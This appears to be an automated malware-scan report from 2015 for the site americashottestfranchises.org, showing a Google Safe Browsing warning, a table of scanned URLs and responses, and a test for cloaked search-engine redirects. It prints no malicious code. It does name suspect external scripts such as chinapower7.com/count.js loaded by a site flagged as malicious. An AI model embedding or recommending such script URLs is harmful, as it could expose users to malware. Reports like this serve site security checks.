Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=americashottestfranchises.org
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://americashottestfranchises.org/ | 200 OK Content-Length: 75757 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
http://chinapower7.com/count.js | 500 Can't connect to chinapower7.com:80 Content-Length: 190 Content-Type: text/plain | clean |
http://chinapower7.com/test404page.js | 500 Can't connect to chinapower7.com:80 Content-Length: 190 Content-Type: text/plain | clean |
http://question.eu.gp/wp-admin/wp-app.php | HTTP/1.1 503 Service Unavailable Connection: close Date: Wed, 14 Jan 2015 03:06:34 GMT Retry-After: 604800 Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 2621 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.4.36-0+deb7u3 | clean |
http://www.qualigo.de/doks/search/source/std/charge_direct.php?ds=subdomzz&subds=eu.gp&fallback_url=http%3a%2f%2fwww.eu.gp | HTTP/1.1 503 Service Unavailable Connection: close Date: Wed, 14 Jan 2015 03:06:35 GMT Accept-Ranges: bytes Retry-After: 604800 Server: Apache Vary: Accept-Encoding Content-Length: 307 Content-Type: text/html; charset=UTF-8 | clean |
http://www.qualigo.de/doks/search/source/std/charge_direct.php?ds=subdomzz&subds=eu.gp&fallback_url=http%3a%2f%2fwww.eu.gp&force_refresh=1 | HTTP/1.1 307 Temporary Redirect Connection: close Date: Wed, 14 Jan 2015 03:06:35 GMT Accept-Ranges: bytes Location: http://www.eu.gp Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=ISO-8859-15 | clean |
http://www.eu.gp/ | 200 OK Content-Length: 43575 Content-Type: text/html | clean |
http://www.eu.gp/static/js/jquery-1.4.2.min.js | 200 OK Content-Length: 72174 Content-Type: application/javascript | clean |
http://question.eu.gp/static/js/jquery-ui-1.8.4.custom.min.js | 404 Not Found Content-Length: 0 Content-Type: text/html | clean |
http://question.eu.gp/static/js/plugins/jquery.cookies.js | 404 Not Found Content-Length: 0 Content-Type: text/html | clean |
http://question.eu.gp/static/js/plugins/jquery.equalheights.js | 404 Not Found Content-Length: 0 Content-Type: text/html | clean |
http://question.eu.gp/static/js/plugins/jquery.json-2.2.js | 404 Not Found Content-Length: 0 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: americashottestfranchises.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 14 Jan 2015 03:06:32 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 75757
Content-Type: text/html
...75757 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: americashottestfranchises.org
Referer: http://www.google.com/search?q=americashottestfranchises.org
Result:
The result is similar to the first query. There are no suspicious redirects found.